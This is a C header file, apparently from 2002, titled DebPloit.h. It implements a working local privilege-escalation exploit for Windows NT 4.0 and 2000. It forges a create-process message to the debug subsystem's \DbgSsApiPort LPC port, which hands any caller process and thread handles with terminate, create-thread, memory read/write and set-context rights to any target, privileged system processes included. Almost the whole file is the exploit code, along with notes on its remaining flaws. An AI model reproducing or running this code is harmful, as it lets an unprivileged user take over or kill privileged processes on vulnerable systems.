/* DebPloit.h - get handles to any process, thread 
                on every MS Windows NT 4.0, Windows 2000 (till  Mar-18-2002 ?)


  Mar-11-2002 - initial version


*/


#include <NtSecApi.h>

//#define _DBG


////////////////////////////////////////////////////////////////////////////////////////////////

#define SS_CREATE_PROCESS_REQUEST 2
#define MAX_DBG_SS_CP_LPC_MESSAGE_SIZE 0x80
#define     DBG_SS_CP_LPC_DATA_SIZE    0x38

typedef struct _DBG_SS_CP_LPC_MESSAGE {
    USHORT DataSize;            //00
    USHORT MessageSize;         //02  
    USHORT MessageType;         //04
    USHORT VirtualRangesOffset; //06
    DWORD  CallerPid;           //08
    DWORD  CallerTid;           //0C
    ULONG  MessageId;           //10
    ULONG  SectionSize;         //14
    DWORD  dwSsDebugEventCode;  //18
    DWORD  Status;              //1C 
    DWORD  DebuggeePID;         //20 
    DWORD  DebuggeeTID;         //24
    PVOID  pDbgSsKmMsg;         //28  //size ~ 0x78
    DWORD  DebuggerPID;         //2C
    DWORD  DebuggerTID;         //30
    DWORD  Unknown34;           //34
    DWORD  hFile;               //38
    LPVOID lpBaseOfImage;       //3C 
    DWORD  dwDebugInfoFileOffset;//40 
    DWORD  nDebugInfoSize;      //44
    LPVOID lpThreadLocalBase;   //48
    LPTHREAD_START_ROUTINE lpStartAddress; //4C
    LPVOID lpImageName;         //50
    WORD   fUnicode;            //54
    WORD   ImageName[(MAX_DBG_SS_CP_LPC_MESSAGE_SIZE - 0x56)/sizeof(WORD)]; //56 pro forma
} DBG_SS_CP_LPC_MESSAGE, *PDBG_SS_CP_LPC_MESSAGE;

////////////////////////////////////////////////////////////////////////////////////////////////
//used ntdll.dll's APIs:
#define di __declspec(dllimport)
EXTERN_C di LONG WINAPI ZwRequestPort(HANDLE, PDBG_SS_CP_LPC_MESSAGE);
EXTERN_C di LONG WINAPI DbgUiConnectToDbg(VOID);
EXTERN_C di LONG WINAPI ZwConnectPort(PHANDLE, PLSA_UNICODE_STRING, PSECURITY_QUALITY_OF_SERVICE,
                                      PVOID, PVOID, PULONG, PVOID, PULONG);
#undef di

/*//////////////////////////////////////////////////////////////////////////////////////////////
GetProcessThreadHandle can return
  *) handle to ProcessId or
  *) handle to ThreadId or
  *) handles to both ProcessId and ThreadId.

///////////////////////////////////
On success grants handle to
  *) ProcessId the following access: PROCESS_TERMINATE, PROCESS_CREATE_THREAD,
                                     PROCESS_VM_OPERATION, PROCESS_VM_READ,
                                     PROCESS_VM_WRITE, PROCESS_DUP_HANDLE,
                                     PROCESS_QUERY_INFORMATION, READ_CONTROL 

  *) ThreadId the following access:  THREAD_TERMINATE, THREAD_SUSPEND_RESUME,
                                     THREAD_GET_CONTEXT, THREAD_SET_CONTEXT,
                                     THREAD_QUERY_INFORMATION, READ_CONTROL
///////////////////////////////////
Flaws (to solve):
  A) When GetProcessThreadHandle succeeds,
     terminating the debugger's thread kills:
     *) the whole ProcessId if ProcessId was != 0
     *) the ThreadId only, when ProcessId was == 0
     TODO: Detach debugger by doing something in smss.exe process or
           hook NtTerminateProcess/Thread in smss.exe => preserve Target's life.

  B) Other debugger cannot attach to ProcessId, TargetId.

/*//////////////////////////////////////////////////////////////////////////////////////////////

BOOL WINAPI GetProcessThreadHandle(
              DWORD   ProcessId, // Target PID, optional (0 if not required)
              DWORD   ThreadId,  // Target TID, optional (0 if not required)
              PHANDLE phProcess, // pointer to handle to ProcessId, optional (NULL if not required)
              PHANDLE phThread   // pointer to handle to ThreadId,  optional (NULL if not required)
            ) {

  BOOL    Result = FALSE;
  static  HANDLE hDbgSsApiPort = NULL;
  static  SECURITY_QUALITY_OF_SERVICE QoS =
            {sizeof(QoS), SecurityImpersonation, SECURITY_DYNAMIC_TRACKING, TRUE};
  #define DbgSsApiPortName L"\\DbgSsApiPort"
  static  LSA_UNICODE_STRING DbgSsApiPortNameUS =
            {sizeof(DbgSsApiPortName)-sizeof(WCHAR), sizeof(DbgSsApiPortName),
            DbgSsApiPortName};

  if(phProcess)
    *phProcess = NULL;
  if(phThread)
    *phThread  = NULL;

  if(hDbgSsApiPort ||
     ZwConnectPort(&hDbgSsApiPort, &DbgSsApiPortNameUS, &QoS,
                  NULL, NULL, NULL, NULL, NULL) >= 0) {

    if(DbgUiConnectToDbg() >= 0) { // DebuggerCID must be registered in debugss

      DBG_SS_CP_LPC_MESSAGE DbgSsCpMsg;
      // many fields do not have to be filled
      ZeroMemory(&DbgSsCpMsg, sizeof(DbgSsCpMsg));
      DbgSsCpMsg.DataSize = DBG_SS_CP_LPC_DATA_SIZE;
      DbgSsCpMsg.MessageSize = sizeof(DbgSsCpMsg);
      //DbgSsCpMsg.MessageType = 0;
      //DbgSsCpMsg.VirtualRangesOffset = 0;
      DbgSsCpMsg.dwSsDebugEventCode = SS_CREATE_PROCESS_REQUEST;
      DbgSsCpMsg.DebuggeePID = ProcessId;
      DbgSsCpMsg.DebuggeeTID = ThreadId;
      //DbgSsCpMsg.pDbgSsKmMsg = &DbgSsCpMsg;
      DbgSsCpMsg.DebuggerPID = GetCurrentProcessId();
      DbgSsCpMsg.DebuggerTID = GetCurrentThreadId();

      if(ZwRequestPort(hDbgSsApiPort, &DbgSsCpMsg) >= 0) { // call DbgpSsCreateProcess which creates handle(s)
        DEBUG_EVENT DbgEvent; 
        if(WaitForDebugEvent(&DbgEvent, 512)) { // call DbgpCreateProcess which duplicates handle(s)
          if(DbgEvent.dwDebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {
            if(phProcess)
              *phProcess = DbgEvent.u.CreateProcessInfo.hProcess;
            if(phThread)
              *phThread  = DbgEvent.u.CreateProcessInfo.hThread;
            if(DbgEvent.u.CreateProcessInfo.hProcess || DbgEvent.u.CreateProcessInfo.hThread)
              Result = TRUE;
          }
          //ContinueDebugEvent(DbgEvent.dwProcessId, DbgEvent.dwThreadId, DBG_CONTINUE);
        }
#ifdef _DBG
        else {
          OutputDebugString(TEXT("WaitForDebugEvent failed!\n"));
        }
#endif
      }
#ifdef _DBG
      else {
        OutputDebugString(TEXT("ZwRequestPort failed!\n"));
      }
#endif
    }
#ifdef _DBG
    else {
      OutputDebugString(TEXT("DbgUiConnectToDbg failed!\n"));
    } 
#endif
  }
#ifdef _DBG
  else {
    OutputDebugString(TEXT("ZwConnectPort failed!\n"));
  }
#endif
  return(Result);
}